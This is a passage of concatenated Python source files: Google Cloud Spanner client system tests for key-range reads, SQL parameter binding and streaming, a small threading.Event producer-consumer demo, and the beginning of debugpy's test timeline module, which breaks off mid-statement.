expected = all_data_rows[start : end + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[start], end_open=[end])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start:end]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[start], end_open=[end])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[start], end_closed=[end])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
def test_execute_sql_w_manual_consume(self):
row_count = 3000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=sql,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=sql, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
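    # Shared helper for parameter binding: checks a non-null scalar, a NULL
    # scalar, a non-empty array, an empty array, and a NULL array for the
    # given Spanner type code.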
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=TypeCode.ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(TypeCode.STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(TypeCode.BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(TypeCode.INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(TypeCode.FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": param_types.FLOAT64},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": param_types.FLOAT64},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(TypeCode.BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(
TypeCode.TIMESTAMP, timestamp_1, timestamps, expected_timestamps
)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(TypeCode.DATE, SOME_DATE, dates)
@unittest.skipIf(USE_EMULATOR, "Skipping NUMERIC")
def test_execute_sql_w_numeric_bindings(self):
self._bind_test_helper(TypeCode.NUMERIC, NUMERIC_1, [NUMERIC_1, NUMERIC_2])
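    # STRUCT-typed query parameters: null and non-null structs, nested and
    # empty structs, arrays of structs, anonymous fields, and struct return
    # values, each verified via a SELECT round trip.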
def test_execute_sql_w_query_param_struct(self):
name = "Phred"
count = 123
size = 23.456
height = 188.0
weight = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (name, count, size, (height, weight))},
param_types={"r": record_type},
expected=[(name, count, size, weight)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
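    # Not one of the original tests: a minimal sketch of binding a STRUCT
    # parameter directly in snapshot.execute_sql(), without going through the
    # _check_sql_results() helper. Field names and values here are made up.
    def _struct_param_sketch(self):
        struct_type = param_types.Struct(
            [
                param_types.StructField("name", param_types.STRING),
                param_types.StructField("count", param_types.INT64),
            ]
        )
        with self._db.snapshot() as snapshot:
            return list(
                snapshot.execute_sql(
                    "SELECT @r.name, @r.count",
                    params={"r": ("Phred", 123)},
                    param_types={"r": struct_type},
                )
            )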
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array = rows[0][0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
        # Partitioned queries do not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
# Lists aren't hashable so the results need to be converted
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
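    # Not one of the original tests: the partitioned-query flow used above,
    # spelled out on its own. Assumes `sql` has no ORDER BY, since partitioned
    # queries do not support it.
    def _partitioned_query_sketch(self, sql):
        batch_txn = self._db.batch_snapshot()
        union = set()
        for batch in batch_txn.generate_query_batches(sql):
            for row in batch_txn.process(batch):
                union.add(tuple(row))  # rows are lists; tuples are hashable
        batch_txn.close()
        return union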
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
        if not database.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
inter_thread_communication.py
|
# import time module
import time
# import threading module
import threading
class product:
def buyer(self):
        print('John the consumer is waiting for the product')
print('...............')
event_object.wait()
print('got product')
def seller(self):
time.sleep(5)
        print('Tom the producer is producing items')
        print('Tom goes to the retailer')
event_object.wait()
def retailer(self):
time.sleep(10)
        print('The retailer found the product and sent it directly to the buyer')
event_object.set()
# class object
class_obj = product()
# setting event object
if __name__ == '__main__':
event_object = threading.Event()
# creating threads
T1 = threading.Thread(target=class_obj.buyer)
T2 = threading.Thread(target=class_obj.seller)
T3 = threading.Thread(target=class_obj.retailer)
# starting threads
T1.start()
T2.start()
T3.start()
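# A condensed sketch of the same idea (not part of the example above): one
# thread blocks on Event.wait() until another thread calls Event.set().
def event_handoff_sketch():
    ready = threading.Event()
    def waiter():
        ready.wait()  # blocks here until set() is called
        print('waiter woke up')
    t = threading.Thread(target=waiter)
    t.start()
    time.sleep(1)  # pretend the main thread is busy producing something
    ready.set()  # wake the waiter
    t.join()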
|
timeline.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import contextlib
import itertools
import threading
from debugpy.common import compat, fmt, log, messaging, timestamp
from debugpy.common.compat import queue
from tests.patterns import some
SINGLE_LINE_REPR_LIMIT = 120
"""If repr() of an expectation or an occurrence is longer than this value, it will
be formatted to use multiple shorter lines if possible.
"""
# For use by Expectation.__repr__. Uses fmt() to create unique instances.
_INDENT = fmt("{0}", "_INDENT")
_DEDENT = fmt("{0}", "_DEDENT")
class Timeline(object):
def __init__(self, name=None):
self.name = str(name if name is not None else id(self))
self.ignore_unobserved = []
self._listeners = [] # [(expectation, callable)]
self._index_iter = itertools.count(1)
self._accepting_new = threading.Event()
self._finalized = threading.Event()
self._recorded_new = threading.Condition()
self._record_queue = queue.Queue()
self._recorder_thread = threading.Thread(
target=self._recorder_worker, name=fmt("{0} recorder", self)
)
self._recorder_thread.daemon = True
self._recorder_thread.start()
# Set up initial environment for our first mark()
self._last = None
self._beginning = None
self._accepting_new.set()
self._beginning = self.mark("START")
assert self._last is self._beginning
self._proceeding_from = self._beginning
def expect_frozen(self):
if not self.is_frozen:
raise Exception("Timeline can only be inspected while frozen.")
def __iter__(self):
self.expect_frozen()
return self._beginning.and_following()
def __len__(self):
return len(self.history())
@property
def beginning(self):
return self._beginning
@property
def last(self):
self.expect_frozen()
return self._last
def history(self):
self.expect_frozen()
return list(iter(self))
def __contains__(self, expectation):
self.expect_frozen()
return any(expectation.test(self.beginning, self.last))
def all_occurrences_of(self, expectation):
return tuple(occ for occ in self if occ == expectation)
def __getitem__(self, index):
assert isinstance(index, slice)
assert index.step is None
return Interval(self, index.start, index.stop)
def __reversed__(self):
self.expect_frozen()
return self.last.and_preceding()
@property
def is_frozen(self):
return not self._accepting_new.is_set()
def freeze(self):
self._accepting_new.clear()
def unfreeze(self):
if not self.is_final:
self._accepting_new.set()
@contextlib.contextmanager
def frozen(self):
was_frozen = self.is_frozen
self.freeze()
yield
if not was_frozen and not self.is_final:
self.unfreeze()
@contextlib.contextmanager
def unfrozen(self):
was_frozen = self.is_frozen
self.unfreeze()
yield
if was_frozen or self.is_final:
self.freeze()
@property
def is_final(self):
return self._finalized.is_set()
def finalize(self):
if self.is_final:
return
log.info("Finalizing timeline...")
with self.unfrozen():
self.mark("FINISH")
with self.unfrozen():
self._finalized.set()
# Drain the record queue.
self._record_queue.join()
# Tell the recorder to shut itself down.
self._record_queue.put(None)
self._recorder_thread.join()
assert self._record_queue.empty(), "Finalized timeline had pending records"
def close(self):
self.finalize()
self[:].expect_no_unobserved()
def __enter__(self):
return self
    def __exit__(self, *args):
self.close()
def observe(self, *occurrences):
for occ in occurrences:
occ.observed = True
def observe_all(self, expectation=None):
self.expect_frozen()
occs = (
list(self)
if expectation is None
else [occ for occ in self if occ == expectation]
)
self.observe(*occs)
def wait_until(self, condition, freeze=None):
freeze = freeze or self.is_frozen
try:
with self._recorded_new:
# First, test the condition against the timeline as it currently is.
with self.frozen():
result = condition()
if result:
return result
# Now keep spinning waiting for new occurrences to come, and test the
# condition against every new batch in turn.
self.unfreeze()
while True:
self._recorded_new.wait()
with self.frozen():
result = condition()
if result:
return result
assert not self.is_final
finally:
if freeze:
self.freeze()
def _wait_until_realized(
self, expectation, freeze=None, explain=True, observe=True
):
def has_been_realized():
for reasons in expectation.test(self.beginning, self.last):
if observe:
self.expect_realized(expectation, explain=explain, observe=observe)
return reasons
reasons = self.wait_until(has_been_realized, freeze)
return latest_of(reasons.values())
def wait_until_realized(self, expectation, freeze=None, explain=True, observe=True):
if explain:
log.info("Waiting for {0!r}", expectation)
return self._wait_until_realized(expectation, freeze, explain, observe)
def wait_for(self, expectation, freeze=None, explain=True):
assert expectation.has_lower_bound, (
"Expectation must have a lower time bound to be used with wait_for()! "
